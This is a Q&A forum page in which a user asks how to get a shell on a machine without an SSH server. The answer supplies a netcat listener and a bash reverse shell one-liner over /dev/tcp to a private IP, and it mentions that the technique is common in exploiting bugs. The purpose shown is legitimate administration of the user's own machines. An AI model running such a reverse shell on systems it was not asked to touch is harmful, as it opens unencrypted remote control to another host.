3

I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).

Since I have SSH on my limited machine, I configured a reverse proxy:

$ ssh -R 19999:localhost:22 remoteuser@remotemachine

Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?

Jakuje
  • 24,773
  • 12
  • 69
  • 75
Lars Schneider
  • 5,530
  • 4
  • 33
  • 58

1 Answers1

6

You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:

nc -lvp 9999

And on the limited machine

/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1

Where the 192.168.122.1 is the IP of the full-control machine.

This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar as you propose above).

Jakuje
  • 24,773
  • 12
  • 69
  • 75
  • 2
    That works nicely! Is there a way to tunnel this connection through an SSH connection make from the limited machine to the full-control machine? Or could some other kind of encryption be used? – Lars Schneider Aug 11 '16 at 13:16
  • Second that, could you give an example on how to combine this with ssh tunneling or whatever it is you need to get an encrypted line? – Fractalf May 07 '20 at 16:35